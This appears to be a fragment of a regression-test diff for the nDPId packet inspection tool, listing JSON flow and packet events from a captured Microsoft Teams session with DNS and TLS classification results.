{"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041683611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683605,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1587041684291,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1587041684291,"pkt":"EBMx8Tl2KDc3AG3ICABFAABC19sAAP8RYHfAqAEGwKgBAegLADUALnZLN+4BAAABAAAAAAAACXN1YnN0cmF0ZQZvZmZpY2UDY29tAAABAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1587041684304,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1587041684304,"pkt":"KDc3AG3IEBMx8Tl2CABFAADIzNlAADkR8PPAqAEBwKgBBgA16AsAtAAAN+6BgAABAAUAAAAACXN1YnN0cmF0ZQZvZmZpY2UDY29tAAABAAHADAAFAAEAAABCABQJc3Vic3RyYXRlB21zLWFjZGPAFsAyAAUAAQAAABYACAVhZmQta8AWwFIABQABAAAAGQAoEm91dGxvb2stb2ZmaWNlLWNvbQZrLTAwMDIIay1tc2VkZ2UDbmV0AMBmAAUAAQAAAKAAAsB5wHkAAQABAAAAoQAEDWsSCw=="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041684304,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041684304,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684306,"flow_last_seen":1587041684306,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041684306,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1587041684306,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041684306,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWZTAqAEGDWsSC+yFAbvNnLiZAAAAALAC\/\/\/7GwAAAgQFtAEDAwUBAQgKMIS1wQAAAAAEAgAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1587041684317,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041684317,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0FJpAAHUGEAYNaxILwKgBBgG77IU13hw0zZy4moAS\/\/\/HZQAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1587041684317,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041684317,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGWazAqAEGDWsSC+yFAbvNnLiaNd4cNVAQIADoJAAA"} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041684611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041684501,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1587041685090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1587041685090,"pkt":"EBMx8Tl2KDc3AG3ICABFAABJHhYAAP8RGjbAqAEGwKgBAe89ADUANcKVVKoBAAABAAAAAAAABGV1YXoCdHIFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685091,"flow_last_seen":1587041685091,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685091,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1587041685091,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1587041685091,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZE40AAP8RJK\/AqAEGwKgBAdGuADUARafs9AEBAAABAAAAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AABwAAQ=="} -00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685091,"flow_last_seen":1587041685091,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685091,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685091,"flow_last_seen":1587041685091,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685091,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685092,"flow_last_seen":1587041685092,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1587041685092,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1587041685092,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZD5kAAP8RKKPAqAEGwKgBAf7OADUARYKEB0oBAAABAAAAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AAAEAAQ=="} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685092,"flow_last_seen":1587041685092,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685092,"flow_last_seen":1587041685092,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685093,"flow_last_seen":1587041685093,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041685093,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1587041685093,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1587041685093,"pkt":"EBMx8Tl2KDc3AG3ICABFAABRstMAAP8RhXDAqAEGwKgBAcXdADUAPUwYqlcBAAABAAAAAAAAA2FwaQtmbGlnaHRwcm94eQV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685093,"flow_last_seen":1587041685093,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041685093,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685093,"flow_last_seen":1587041685093,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041685093,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 